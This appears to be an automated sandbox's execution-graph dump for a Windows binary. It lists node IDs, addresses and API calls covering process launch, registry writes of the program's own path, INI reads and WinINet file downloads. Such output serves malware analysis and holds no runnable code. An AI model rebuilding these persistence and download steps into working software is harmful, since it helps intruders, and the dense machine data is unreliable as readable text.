                                                                                                                                                                                                                                                                          Signature Coverage:0.3%
                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:35
                                                                                                                                                                                                                                                                          execution_graph 61981 d854e 61982 d855a ___scrt_is_nonwritable_in_current_image 61981->61982 62007 d7f47 61982->62007 61984 d8561 61985 d86b4 61984->61985 61996 d858b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 61984->61996 62049 d87d0 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __purecall 61985->62049 61987 d86bb 62042 e56be 61987->62042 61991 d86c9 61992 d85aa 61993 d862b 62015 d88eb GetStartupInfoW __purecall 61993->62015 61995 d8631 62016 c8850 CoInitializeEx DefWindowProcW InitCommonControlsEx LoadLibraryW 61995->62016 61996->61992 61996->61993 62045 e5698 41 API calls 4 library calls 61996->62045 62008 d7f50 62007->62008 62051 d89cd IsProcessorFeaturePresent 62008->62051 62010 d7f5c 62052 db8b0 10 API calls 2 library calls 62010->62052 62012 d7f61 62013 d7f65 62012->62013 62053 db8cf 7 API calls 2 library calls 62012->62053 62013->61984 62015->61995 62054 c8f10 62016->62054 64199 e54a6 62042->64199 62045->61993 62049->61987 62050 e5682 23 API calls __purecall 62050->61991 62051->62010 62052->62012 62053->62013 62055 c8f6d GetCurrentThreadId 62054->62055 62056 c8f54 62054->62056 62202 d8130 62055->62202 62056->62055 62058 c88e5 62059 67780 62058->62059 62228 64250 62059->62228 62062 67816 62249 623d0 62062->62249 62065 677fa 62068 c0850 62065->62068 62066 677b5 62066->62065 62243 63430 62066->62243 62265 624d0 62068->62265 62070 c0884 62071 64250 56 API calls 62070->62071 62072 c089d 62071->62072 62075 64250 56 API calls 62072->62075 62140 c0df8 62072->62140 62073 623d0 RaiseException 62074 c0e30 62073->62074 62076 c08c2 62075->62076 62077 64250 56 API calls 62076->62077 62076->62140 62078 c08e7 62077->62078 62079 64250 56 API calls 62078->62079 62078->62140 62080 c090c 62079->62080 62080->62140 62269 af570 62080->62269 62083 af570 57 API calls 62084 c093a 62083->62084 62085 64250 56 API calls 62084->62085 62086 c095d 62085->62086 62087 64250 56 API calls 62086->62087 62086->62140 62088 c0985 62087->62088 62089 64250 56 API calls 62088->62089 62088->62140 62090 c09ad 62089->62090 62091 64250 56 API calls 62090->62091 62090->62140 62092 c09d5 62091->62092 62093 64250 56 API calls 62092->62093 62092->62140 62094 c09fd 62093->62094 62095 64250 56 API calls 62094->62095 62094->62140 62096 c0a2c 62095->62096 62097 64250 56 API calls 62096->62097 62096->62140 62098 c0a5b 62097->62098 62099 64250 56 API calls 62098->62099 62098->62140 62100 c0a8f 62099->62100 62101 64250 56 API calls 62100->62101 62100->62140 62102 c0ab5 62101->62102 62103 64250 56 API calls 62102->62103 62102->62140 62104 c0adb 62103->62104 62104->62140 62277 ce330 GetModuleFileNameW 62104->62277 62140->62073 62141 c0dfe 62140->62141 62142 c0f50 62141->62142 62471 c1150 62142->62471 62144 c0ff4 62146 87a00 57 API calls 62144->62146 62145 c0fa6 ShellExecuteExW 62145->62144 62148 c0ff9 62146->62148 62149 87a00 57 API calls 62148->62149 62156 c10e9 62148->62156 62151 c1008 62149->62151 62150 c1123 62176 c8ac0 62150->62176 62152 87a00 57 API calls 62151->62152 62151->62156 62153 c1017 62152->62153 62154 64250 56 API calls 62153->62154 62155 c101e 62154->62155 62157 c1137 62155->62157 62161 622b0 42 API calls 62155->62161 62156->62150 62675 c7d50 149 API calls 62156->62675 62159 623d0 RaiseException 62157->62159 62160 c1141 62159->62160 62162 c1049 62161->62162 62672 874c0 60 API calls 62162->62672 62164 c1054 62165 622b0 42 API calls 62164->62165 62177 c8b15 62176->62177 64165 afe00 62177->64165 62203 d8135 ___std_exception_copy 62202->62203 62204 d814f 62203->62204 62206 d8151 std::_Facet_Register 62203->62206 62211 e60c1 62203->62211 62204->62058 62214 d9e4a 62206->62214 62208 d8c21 62209 d8130 std::_Facet_Register 3 API calls 62208->62209 62210 d8c57 62209->62210 62210->62058 62217 e60ee 62211->62217 62215 d9e91 RaiseException 62214->62215 62216 d9e64 62214->62216 62215->62208 62216->62215 62218 e60fa ___scrt_is_nonwritable_in_current_image 62217->62218 62223 e48ad EnterCriticalSection 62218->62223 62220 e6105 62224 e6141 62220->62224 62223->62220 62227 e48f5 LeaveCriticalSection 62224->62227 62226 e60cc 62226->62203 62227->62226 62229 642dc 62228->62229 62230 64288 62228->62230 62232 d7dfb 6 API calls 62229->62232 62242 64367 62229->62242 62255 d7dfb EnterCriticalSection 62230->62255 62235 642f6 62232->62235 62233 64292 62233->62229 62234 6429e GetProcessHeap 62233->62234 62260 d810d 44 API calls 62234->62260 62235->62242 62262 d810d 44 API calls 62235->62262 62238 642cb 62261 d7db1 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62238->62261 62239 64356 62263 d7db1 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62239->62263 62242->62062 62242->62066 62244 63446 62243->62244 62245 623d0 RaiseException 62244->62245 62247 6350b 62245->62247 62246 623d0 RaiseException 62248 635ae 62246->62248 62247->62246 62250 623dd 62249->62250 62251 d9e4a Concurrency::cancel_current_task RaiseException 62250->62251 62252 623ea 62251->62252 62253 623d0 RaiseException 62252->62253 62254 623fa 62253->62254 62259 d7e0f 62255->62259 62256 d7e14 LeaveCriticalSection 62256->62233 62259->62256 62264 d7e83 SleepConditionVariableCS LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 62259->62264 62260->62238 62261->62229 62262->62239 62263->62242 62264->62259 62266 6250e 62265->62266 62267 6251d 62266->62267 62370 62400 62266->62370 62267->62070 62270 64250 56 API calls 62269->62270 62271 af5b8 62270->62271 62274 64250 56 API calls 62271->62274 62275 af5ec 62271->62275 62272 623d0 RaiseException 62273 af64e 62272->62273 62274->62275 62275->62272 62276 af5f0 62275->62276 62276->62083 62278 ce463 62277->62278 62279 ce383 62277->62279 62282 63430 RaiseException 62278->62282 62383 87a00 62279->62383 62288 ce48b _wcsrchr 62282->62288 62283 ce517 62284 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 62283->62284 62287 c0afd 62284->62287 62285 87a00 57 API calls 62286 ce397 62285->62286 62286->62283 62295 ce4c9 _wcsrchr 62288->62295 62414 67870 62288->62414 62295->62283 62430 69880 62295->62430 62371 6248f 62370->62371 62375 62432 __purecall 62370->62375 62371->62267 62372 62436 62380 dd09d 14 API calls __Wcrtomb 62372->62380 62374 6244e std::locale::_Locimp::_Locimp 62374->62267 62375->62372 62375->62374 62377 6247b 62375->62377 62377->62371 62381 dd09d 14 API calls __Wcrtomb 62377->62381 62379 6243b 62382 dcf9f 41 API calls ___std_exception_copy 62379->62382 62380->62379 62381->62379 62382->62371 62384 87a3c 62383->62384 62402 87b4a 62383->62402 62385 d7dfb 6 API calls 62384->62385 62386 87a46 62385->62386 62386->62402 62402->62283 62402->62285 62415 678b2 62414->62415 62417 678bd 62414->62417 62472 c122c 62471->62472 62473 c119b 62471->62473 62475 63430 RaiseException 62472->62475 63270 c48f0 62473->63270 62476 c123e 62475->62476 62479 622b0 42 API calls 62476->62479 62478 685d0 42 API calls 62480 c11b6 62478->62480 62481 c1250 62479->62481 62483 d8130 std::_Facet_Register 3 API calls 62480->62483 62676 c4f50 62481->62676 62484 c11e2 62483->62484 62486 a0850 80 API calls 62484->62486 62485 c1f76 62492 c1fcc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 62485->62492 63373 c8220 21 API calls 2 library calls 62485->63373 62490 c11f7 62486->62490 62488 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 62493 c0f7f 62488->62493 62494 a0ce0 191 API calls 62490->62494 62491 c48f0 68 API calls 62495 c12ae 62491->62495 62492->62488 62493->62144 62493->62145 62497 c120a 62494->62497 62496 685d0 42 API calls 62495->62496 62498 c12c1 62496->62498 62497->62472 62497->62485 62500 685d0 42 API calls 62497->62500 62499 c134e 62498->62499 62501 d8130 std::_Facet_Register 3 API calls 62498->62501 62499->62485 62503 64250 56 API calls 62499->62503 62519 c13e5 62499->62519 62500->62472 62502 c12fa 62501->62502 62912 a0850 62502->62912 62505 c1385 62503->62505 62507 c2005 62505->62507 62515 67990 60 API calls 62505->62515 62508 623d0 RaiseException 62507->62508 62511 c200f 62508->62511 62509 c1337 62972 a0ce0 62509->62972 63374 68770 RaiseException 62511->63374 62512 685d0 42 API calls 62512->62509 62513 685d0 42 API calls 62516 c148f 62513->62516 62518 c13b6 RegCreateKeyExW 62515->62518 62521 685d0 42 API calls 62516->62521 62517 c201b 62522 623d0 RaiseException 62517->62522 62518->62519 62520 c13e7 GetModuleFileNameW RegQueryValueExW 62518->62520 62519->62513 62523 c1428 RegSetValueExW 62520->62523 62524 c1452 RegCloseKey 62520->62524 62525 c149e 62521->62525 62526 c2025 62522->62526 62523->62524 62524->62519 62527 685d0 42 API calls 62525->62527 62528 623d0 RaiseException 62526->62528 62530 c14ad 62527->62530 62529 c202f 62528->62529 62531 685d0 42 API calls 62530->62531 62532 c14bc 62531->62532 62532->62511 62533 c14e1 62532->62533 62535 685d0 42 API calls 62532->62535 63170 c7b50 62533->63170 62535->62533 62672->62164 62675->62150 62677 624d0 41 API calls 62676->62677 62678 c4f86 62677->62678 63375 69da0 62678->63375 62682 c7a7a 63436 68770 RaiseException 62682->63436 62686 c7a86 62687 c6e0d 62687->62682 62688 c7a70 62687->62688 62744 c4fc5 62687->62744 62776 c7a90 43 API calls 62687->62776 62812 64250 56 API calls 62687->62812 62822 63430 RaiseException 62687->62822 62837 c79cd 62687->62837 62690 623d0 RaiseException 62688->62690 62690->62682 62691 c50d3 62692 c6148 62691->62692 62694 c5253 62691->62694 62691->62744 62702 c640f 62692->62702 62707 c6223 62692->62707 62692->62744 62693 624d0 41 API calls 62695 c535a 62693->62695 62694->62682 62694->62693 62694->62744 62696 64250 56 API calls 62695->62696 62697 c5363 62696->62697 62697->62688 62698 c539c 62697->62698 62699 63430 RaiseException 62697->62699 62700 64250 56 API calls 62698->62700 62699->62698 62703 c53a5 62700->62703 62701 685d0 42 API calls 62701->62707 62708 c6547 62702->62708 62710 c65b1 62702->62710 62702->62744 62703->62688 62704 c53de 62703->62704 62705 63430 RaiseException 62703->62705 63407 a0490 62704->63407 62705->62704 62707->62682 62707->62701 62707->62744 62711 685d0 42 API calls 62708->62711 62708->62744 62709 c53f9 62712 64250 56 API calls 62709->62712 62713 c6643 62710->62713 62715 c6a01 62710->62715 62710->62744 62711->62744 62719 c543d 62712->62719 62714 624d0 41 API calls 62713->62714 62713->62744 62716 c6676 62714->62716 62717 c6a3b 62715->62717 62723 c6c2d 62715->62723 62718 64250 56 API calls 62716->62718 62717->62682 62724 685d0 42 API calls 62717->62724 62717->62744 62727 c667f 62718->62727 62719->62688 62726 c6d9c 62723->62726 62743 c6c67 62723->62743 62725 c6a5f 62724->62725 62725->62682 62728 c6a69 62725->62728 62726->62688 62734 c6dad 62726->62734 62727->62688 62730 c66b8 62727->62730 62731 63430 RaiseException 62727->62731 62729 685d0 42 API calls 62728->62729 62739 c6a7b 62729->62739 62732 64250 56 API calls 62730->62732 62731->62730 62742 c66c1 62732->62742 62738 685d0 42 API calls 62734->62738 62734->62744 62738->62744 62741 685d0 42 API calls 62739->62741 62739->62744 62741->62744 62742->62688 62745 c66fa 62742->62745 62749 63430 RaiseException 62742->62749 62743->62682 62743->62744 62748 685d0 42 API calls 62743->62748 63403 681e0 62744->63403 62747 a0490 63 API calls 62745->62747 62750 c6712 62747->62750 62748->62743 62749->62745 62751 64250 56 API calls 62750->62751 62756 c6756 62751->62756 62756->62688 62757 c678f 62756->62757 62758 63430 RaiseException 62756->62758 62759 64250 56 API calls 62757->62759 62758->62757 62765 c6798 62759->62765 62765->62688 62766 c67d1 62765->62766 62768 63430 RaiseException 62765->62768 62768->62766 62776->62687 62812->62687 62822->62687 62837->62682 62837->62744 62838 685d0 42 API calls 62837->62838 62840 c7a2e 62838->62840 62840->62682 62840->62744 62841 c7a4d 62840->62841 62842 685d0 42 API calls 62841->62842 62842->62744 62913 64250 56 API calls 62912->62913 62914 a0885 62913->62914 62917 64250 56 API calls 62914->62917 62970 a0c9e 62914->62970 62915 623d0 RaiseException 62916 a0cd5 62915->62916 62918 a08c4 62917->62918 62919 64250 56 API calls 62918->62919 62918->62970 62920 a08e7 62919->62920 62921 64250 56 API calls 62920->62921 62920->62970 62922 a090a 62921->62922 62924 a0973 62922->62924 62922->62970 63452 69cc0 62922->63452 62925 64250 56 API calls 62924->62925 62926 a0982 62925->62926 62927 64250 56 API calls 62926->62927 62926->62970 62928 a09a5 62927->62928 62929 64250 56 API calls 62928->62929 62928->62970 62970->62915 62971 a0ca2 62970->62971 62971->62509 62971->62512 63516 6d780 62972->63516 62975 a0d1b 62975->62499 62976 624d0 41 API calls 62977 a0d49 62976->62977 63519 a03d0 CreateFileW 62977->63519 63171 c7b8a _wcsrchr 63170->63171 63172 64250 56 API calls 63171->63172 63173 c7ba1 63172->63173 63174 c7d45 63173->63174 63177 64250 56 API calls 63173->63177 63175 623d0 RaiseException 63174->63175 63176 c7d4f 63175->63176 63178 c7bc2 63177->63178 63178->63174 63179 c7bca 63178->63179 63271 64250 56 API calls 63270->63271 63275 c493d 63271->63275 63272 c4cf0 63273 623d0 RaiseException 63272->63273 63274 c4cfa 63273->63274 63275->63272 63276 c4979 63275->63276 63277 63430 RaiseException 63275->63277 63278 64250 56 API calls 63276->63278 63277->63276 63279 c4999 63278->63279 63279->63272 63280 685d0 42 API calls 63279->63280 63281 c49c5 RegOpenKeyExW 63280->63281 63282 c49f5 63281->63282 63283 64250 56 API calls 63282->63283 63284 c4a02 63283->63284 63284->63272 63285 64250 56 API calls 63284->63285 63286 c4a20 63285->63286 63286->63272 63287 c4a59 63286->63287 63289 63430 RaiseException 63286->63289 63288 67c10 3 API calls 63287->63288 63290 c4a6d 63288->63290 63289->63287 63291 6d780 9 API calls 63290->63291 63292 c4a93 63291->63292 63293 c4b0e GetModuleFileNameW 63292->63293 63294 c4a97 63292->63294 63295 64250 56 API calls 63293->63295 63296 624d0 41 API calls 63294->63296 63297 c4b28 63295->63297 63298 c4aa2 63296->63298 63297->63272 63305 c4b32 63297->63305 63299 c4adc 63298->63299 63300 c4ad5 RegCloseKey 63298->63300 63301 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 63299->63301 63300->63299 63302 c11a7 63301->63302 63302->62478 63303 c4b73 63304 685d0 42 API calls 63303->63304 63307 c4b83 _wcsrchr 63304->63307 63305->63303 63306 63430 RaiseException 63305->63306 63306->63303 63308 c4c3e 63307->63308 63311 69880 57 API calls 63307->63311 63309 622b0 42 API calls 63308->63309 63310 c4c5c 63309->63310 63312 624d0 41 API calls 63310->63312 63313 c4bd1 63311->63313 63314 c4c67 63312->63314 64087 890c0 58 API calls 63313->64087 63317 c4c9a RegCloseKey 63314->63317 63318 c4ca1 63314->63318 63316 c4be3 63316->63308 63319 c4c37 RegCloseKey 63316->63319 63317->63318 63318->63299 63319->63308 63373->62492 63374->62517 63376 69e05 63375->63376 63380 69db5 63375->63380 63383 69e8c 63376->63383 63437 e1a01 63376->63437 63378 69e26 63382 e1a01 GetStringTypeW 63378->63382 63385 69e44 63378->63385 63379 e1a01 GetStringTypeW 63379->63380 63380->63379 63390 69ddf 63380->63390 63381 69e9a 63392 6c250 63381->63392 63382->63378 63383->63381 63384 623d0 RaiseException 63383->63384 63387 69eb6 63384->63387 63385->63381 63385->63383 63386 69e69 63385->63386 63441 62240 41 API calls 63385->63441 63442 6a110 42 API calls 3 library calls 63386->63442 63390->63376 63390->63383 63440 62240 41 API calls 63390->63440 63393 6c410 63392->63393 63401 6c294 _wcschr 63392->63401 63393->62682 63393->62687 63393->62691 63393->62744 63394 6c490 63395 623d0 RaiseException 63394->63395 63398 6c49a 63395->63398 63396 6c3e2 63448 68280 43 API calls __Getctype 63396->63448 63397 6c452 63449 68280 43 API calls __Getctype 63397->63449 63401->63393 63401->63394 63401->63396 63401->63397 63402 68280 43 API calls 63401->63402 63402->63401 63404 68249 63403->63404 63405 6820c 63403->63405 63404->62485 63404->62491 63404->62498 63406 e1a14 ___std_exception_copy 14 API calls 63405->63406 63406->63404 63408 64250 56 API calls 63407->63408 63409 a04c0 63408->63409 63410 a04ca 63409->63410 63411 a05d3 63409->63411 63414 a04eb GetPrivateProfileStringW 63410->63414 63412 623d0 RaiseException 63411->63412 63413 a05dd 63412->63413 63415 a061c GetPrivateProfileSectionNamesW 63413->63415 63416 a056e 63414->63416 63417 a0517 63414->63417 63418 a0640 63415->63418 63419 a0697 63415->63419 63423 63430 RaiseException 63416->63423 63424 a0542 GetPrivateProfileStringW 63417->63424 63425 a066e GetPrivateProfileSectionNamesW 63418->63425 63420 681e0 std::generic_category 14 API calls 63419->63420 63421 a06a1 63420->63421 63422 64250 56 API calls 63421->63422 63429 a058c 63423->63429 63424->63416 63424->63417 63425->63418 63425->63419 63429->62709 63436->62686 63443 e97f4 63437->63443 63440->63376 63441->63386 63442->63383 63444 e1a10 63443->63444 63445 e9811 63443->63445 63444->63378 63445->63444 63447 f46c7 GetStringTypeW 63445->63447 63447->63444 63448->63393 63449->63393 63453 69cfa 63452->63453 63456 69d0b 63452->63456 63454 623d0 RaiseException 63453->63454 63453->63456 63455 69d9b 63454->63455 63456->62922 63914 6d7c0 63516->63914 63915 6d7fc 63914->63915 63919 6d804 63914->63919 63916 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 63915->63916 63918 6d7a8 63916->63918 63917 6d8f1 63920 623d0 RaiseException 63917->63920 63918->62975 63918->62976 63919->63915 63919->63917 63922 6d834 __purecall 63919->63922 63921 6d8fb 63920->63921 63922->63915 63923 6d852 FindFirstFileW 63922->63923 63924 6d881 63923->63924 63925 6d89e GetLastError 63923->63925 63924->63915 63926 6d8bb FindClose 63924->63926 63925->63924 63926->63915 64087->63316 64166 afe39 UnmapViewOfFile 64165->64166 64167 afe40 64165->64167 64166->64167 64168 afe4d CloseHandle 64167->64168 64169 afe50 64167->64169 64168->64169 64170 afe5a 64169->64170 64171 afe57 CloseHandle 64169->64171 64172 afe61 CloseHandle 64170->64172 64173 afe64 64170->64173 64171->64170 64172->64173 64174 9e640 64173->64174 64175 681e0 std::generic_category 14 API calls 64174->64175 64200 e54e5 64199->64200 64201 e54d3 64199->64201 64211 e534f 64200->64211 64226 e556e GetModuleHandleW 64201->64226 64204 e54d8 64204->64200 64227 e55d3 GetModuleHandleExW 64204->64227 64206 d86c1 64206->62050 64212 e535b ___scrt_is_nonwritable_in_current_image 64211->64212 64233 e48ad EnterCriticalSection 64212->64233 64214 e5365 64234 e53bb 64214->64234 64216 e5372 64238 e5390 64216->64238 64219 e553d 64243 e55b1 64219->64243 64222 e555b 64224 e55d3 __purecall 3 API calls 64222->64224 64223 e554b GetCurrentProcess TerminateProcess 64223->64222 64225 e5563 ExitProcess 64224->64225 64226->64204 64228 e5612 GetProcAddress 64227->64228 64229 e5633 64227->64229 64228->64229 64230 e5626 64228->64230 64231 e5639 FreeLibrary 64229->64231 64232 e54e4 64229->64232 64230->64229 64231->64232 64232->64200 64233->64214 64236 e53c7 ___scrt_is_nonwritable_in_current_image 64234->64236 64235 e542e __purecall 64235->64216 64236->64235 64241 e5edb 14 API calls 3 library calls 64236->64241 64242 e48f5 LeaveCriticalSection 64238->64242 64240 e537e 64240->64206 64240->64219 64241->64235 64242->64240 64248 ef2f8 6 API calls __purecall 64243->64248 64245 e55b6 64246 e55bb GetPEB 64245->64246 64247 e5547 64245->64247 64246->64247 64247->64222 64247->64223 64248->64245 64249 691f0 64250 624d0 41 API calls 64249->64250 64251 69230 64250->64251 64252 624d0 41 API calls 64251->64252 64253 69242 64252->64253 64254 69255 InternetCrackUrlW 64253->64254 64266 69694 64253->64266 64256 69300 64254->64256 64257 6929f 64254->64257 64255 6973a 64259 69746 64255->64259 64260 6975c 64255->64260 64262 64250 56 API calls 64256->64262 64258 64250 56 API calls 64257->64258 64263 692a4 64258->64263 64264 6d2a0 42 API calls 64259->64264 64268 685d0 42 API calls 64260->64268 64261 697cb 64265 623d0 RaiseException 64261->64265 64267 6930b 64262->64267 64274 623d0 RaiseException 64263->64274 64279 692ac 64263->64279 64269 6974b 64264->64269 64265->64263 64266->64255 64266->64261 64270 696ec 64266->64270 64271 67910 42 API calls 64267->64271 64272 6975a 64268->64272 64273 622b0 42 API calls 64269->64273 64270->64255 64275 696f3 64270->64275 64280 69316 64271->64280 64276 624d0 41 API calls 64272->64276 64273->64272 64278 697df 64274->64278 64277 624d0 41 API calls 64275->64277 64276->64279 64277->64279 64280->64261 64281 6936b _wcsrchr 64280->64281 64282 69880 57 API calls 64280->64282 64285 67870 57 API calls 64281->64285 64289 693c2 _wcschr 64281->64289 64283 6935e 64282->64283 64286 685d0 42 API calls 64283->64286 64284 6944c 64287 64250 56 API calls 64284->64287 64288 693b5 64285->64288 64286->64281 64293 6955c 64287->64293 64290 685d0 42 API calls 64288->64290 64289->64284 64291 69432 64289->64291 64292 69451 64289->64292 64290->64289 64294 69880 57 API calls 64291->64294 64292->64284 64296 67870 57 API calls 64292->64296 64293->64263 64300 63430 RaiseException 64293->64300 64302 69595 64293->64302 64295 6943f 64294->64295 64297 685d0 42 API calls 64295->64297 64298 69468 64296->64298 64297->64284 64299 685d0 42 API calls 64298->64299 64305 69475 _wcschr 64299->64305 64300->64302 64301 695cc 64303 64250 56 API calls 64301->64303 64302->64261 64302->64301 64304 6dfb0 42 API calls 64302->64304 64306 695ef 64303->64306 64304->64302 64305->64284 64307 69880 57 API calls 64305->64307 64313 694d6 _wcschr 64305->64313 64306->64263 64309 63430 RaiseException 64306->64309 64311 69628 _wcsrchr 64306->64311 64308 694c9 64307->64308 64310 685d0 42 API calls 64308->64310 64309->64311 64310->64313 64312 69666 _wcschr 64311->64312 64321 6be50 42 API calls 64311->64321 64312->64266 64315 622b0 42 API calls 64312->64315 64313->64284 64314 67870 57 API calls 64313->64314 64317 6952c 64314->64317 64315->64266 64318 685d0 42 API calls 64317->64318 64318->64284 64319 6965a 64320 622b0 42 API calls 64319->64320 64320->64312 64321->64319 64322 e5a06 64335 f0038 GetEnvironmentStringsW 64322->64335 64324 e5a17 64325 e5a1d 64324->64325 64326 e5a29 64324->64326 64327 e82a1 ___free_lconv_mon 14 API calls 64325->64327 64342 e5a5a 64326->64342 64329 e5a23 64327->64329 64331 e82a1 ___free_lconv_mon 14 API calls 64332 e5a4d 64331->64332 64333 e82a1 ___free_lconv_mon 14 API calls 64332->64333 64334 e5a53 64333->64334 64336 f0049 64335->64336 64337 f0047 64335->64337 64364 e82db 64336->64364 64337->64324 64339 f005e std::locale::_Locimp::_Locimp 64340 e82a1 ___free_lconv_mon 14 API calls 64339->64340 64341 f0078 FreeEnvironmentStringsW 64340->64341 64341->64324 64344 e5a79 64342->64344 64372 e9937 64344->64372 64346 e5ac1 64347 e82a1 ___free_lconv_mon 14 API calls 64346->64347 64350 e5a30 64347->64350 64348 e5b40 64349 e82a1 ___free_lconv_mon 14 API calls 64348->64349 64349->64350 64350->64331 64351 e9937 __Getctype 14 API calls 64357 e5acb 64351->64357 64352 e5b50 64380 e5b78 14 API calls ___free_lconv_mon 64352->64380 64355 e5b56 64356 e82a1 ___free_lconv_mon 14 API calls 64355->64356 64359 e5b5e 64356->64359 64357->64348 64357->64351 64357->64352 64358 e5b6b 64357->64358 64360 e82a1 ___free_lconv_mon 14 API calls 64357->64360 64379 e1abd 41 API calls 2 library calls 64357->64379 64381 dcfcc 11 API calls __purecall 64358->64381 64362 e82a1 ___free_lconv_mon 14 API calls 64359->64362 64360->64357 64362->64350 64363 e5b77 64365 e8319 64364->64365 64369 e82e9 __Getctype 64364->64369 64371 dd09d 14 API calls __Wcrtomb 64365->64371 64367 e8304 RtlAllocateHeap 64368 e8317 64367->64368 64367->64369 64368->64339 64369->64365 64369->64367 64370 e60c1 std::_Facet_Register 2 API calls 64369->64370 64370->64369 64371->64368 64377 e9944 __Getctype 64372->64377 64373 e9984 64382 dd09d 14 API calls __Wcrtomb 64373->64382 64374 e996f RtlAllocateHeap 64375 e5ab9 64374->64375 64374->64377 64375->64346 64375->64357 64377->64373 64377->64374 64378 e60c1 std::_Facet_Register 2 API calls 64377->64378 64378->64377 64379->64357 64380->64355 64381->64363 64382->64375 64383 8b610 64384 8b668 64383->64384 64392 8b69d 64383->64392 64385 681e0 std::generic_category 14 API calls 64384->64385 64386 8b66f __Getctype 64385->64386 64387 8b75e 64386->64387 64389 8c175 64386->64389 64725 68280 43 API calls __Getctype 64386->64725 64388 685d0 42 API calls 64387->64388 64390 8b77a 64388->64390 64737 68770 RaiseException 64389->64737 64393 685d0 42 API calls 64390->64393 64392->64386 64724 6a110 42 API calls 3 library calls 64392->64724 64396 8b786 64393->64396 64394 8c181 64397 623d0 RaiseException 64394->64397 64399 622b0 42 API calls 64396->64399 64400 8c18b 64397->64400 64417 8b795 64399->64417 64401 623d0 RaiseException 64400->64401 64403 8c195 64401->64403 64402 8b839 64406 87a00 57 API calls 64402->64406 64404 8b888 64529 8cde0 CreateEventW 64404->64529 64408 8b9b4 64406->64408 64407 8b89c 64409 8b8aa 64407->64409 64410 8bac6 64407->64410 64412 8bab2 64408->64412 64418 87a00 57 API calls 64408->64418 64414 87a00 57 API calls 64409->64414 64415 8baeb InternetSetOptionW 64410->64415 64425 8baf7 64410->64425 64411 8b7e5 InternetCrackUrlW 64416 8b829 GetLastError 64411->64416 64411->64417 64728 8f940 139 API calls 64412->64728 64420 8b8af 64414->64420 64415->64425 64416->64402 64416->64417 64417->64389 64417->64402 64417->64404 64417->64411 64422 8b9c3 64418->64422 64419 8b999 64424 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 64419->64424 64420->64419 64427 87a00 57 API calls 64420->64427 64421 8c15d 64736 8f940 139 API calls 64421->64736 64422->64412 64426 87a00 57 API calls 64422->64426 64428 8c157 64424->64428 64425->64400 64425->64421 64432 8bb38 64425->64432 64429 8b9d2 64426->64429 64431 8b8be 64427->64431 64433 64250 56 API calls 64429->64433 64431->64419 64434 87a00 57 API calls 64431->64434 64436 8bb4c CreateFileW 64432->64436 64437 8bbd0 64432->64437 64435 8b9dd 64433->64435 64438 8b8cd 64434->64438 64435->64394 64447 622b0 42 API calls 64435->64447 64439 8bb93 GetFileSize 64436->64439 64443 8bb82 64436->64443 64440 64250 56 API calls 64437->64440 64441 64250 56 API calls 64438->64441 64439->64443 64444 8bbeb 64440->64444 64445 8b8d4 64441->64445 64442 8bbba CloseHandle 64446 8bbca 64442->64446 64443->64442 64443->64446 64444->64394 64538 8d0b0 64444->64538 64445->64394 64452 622b0 42 API calls 64445->64452 64446->64437 64448 8ba10 64447->64448 64450 64250 56 API calls 64448->64450 64453 8ba15 64450->64453 64451 8bc26 64564 8fae0 64451->64564 64455 8b907 64452->64455 64453->64394 64456 8ba1f 64453->64456 64458 64250 56 API calls 64455->64458 64466 622b0 42 API calls 64456->64466 64457 8bc3e 64459 8bd3b 64457->64459 64460 8bc46 64457->64460 64461 8b90c 64458->64461 64462 8bd43 64459->64462 64463 8be87 64459->64463 64464 87a00 57 API calls 64460->64464 64461->64394 64465 8b916 64461->64465 64468 87a00 57 API calls 64462->64468 64470 8bf48 64463->64470 64475 8bef3 64463->64475 64469 8bc4b 64464->64469 64481 622b0 42 API calls 64465->64481 64467 8ba45 64466->64467 64727 87cf0 139 API calls 64467->64727 64472 8bd48 64468->64472 64479 87a00 57 API calls 64469->64479 64506 8bd31 InternetSetStatusCallbackW InternetCloseHandle 64469->64506 64473 8c00b 64470->64473 64474 8bf55 64470->64474 64478 8be2d 64472->64478 64483 87a00 57 API calls 64472->64483 64591 8c1a0 64473->64591 64735 61ce0 110 API calls 64474->64735 64733 6d4e0 57 API calls _wcsrchr 64475->64733 64477 8ba60 64477->64412 64478->64506 64731 6d4e0 57 API calls _wcsrchr 64478->64731 64484 8bc5a 64479->64484 64486 8b93c 64481->64486 64490 8bd57 64483->64490 64496 87a00 57 API calls 64484->64496 64484->64506 64485 8bfec 64497 8bf1c 64485->64497 64726 87cf0 139 API calls 64486->64726 64488 8bf04 64734 8f940 139 API calls 64488->64734 64490->64478 64503 87a00 57 API calls 64490->64503 64491 8b953 64491->64419 64493 8c08a 64500 8c0a2 InternetCloseHandle 64493->64500 64501 8c0b3 InternetSetStatusCallbackW InternetCloseHandle 64493->64501 64494 8c043 ResetEvent 64498 8c059 InternetCloseHandle 64494->64498 64499 8c06a WaitForSingleObject WaitForSingleObject 64494->64499 64495 8be46 64732 8f940 139 API calls 64495->64732 64504 8bc69 64496->64504 64497->64493 64497->64494 64498->64499 64499->64493 64500->64501 64501->64506 64507 8bd66 64503->64507 64505 64250 56 API calls 64504->64505 64509 8bc70 64505->64509 64506->64419 64508 64250 56 API calls 64507->64508 64510 8bd6d 64508->64510 64509->64394 64511 622b0 42 API calls 64509->64511 64510->64394 64512 622b0 42 API calls 64510->64512 64513 8bca0 64511->64513 64514 8bd9d 64512->64514 64515 64250 56 API calls 64513->64515 64516 64250 56 API calls 64514->64516 64517 8bca5 64515->64517 64518 8bda2 64516->64518 64517->64394 64519 8bcaf 64517->64519 64518->64394 64520 8bdac 64518->64520 64521 622b0 42 API calls 64519->64521 64522 622b0 42 API calls 64520->64522 64523 8bcd5 64521->64523 64524 8bdd2 64522->64524 64729 87cf0 139 API calls 64523->64729 64730 87cf0 139 API calls 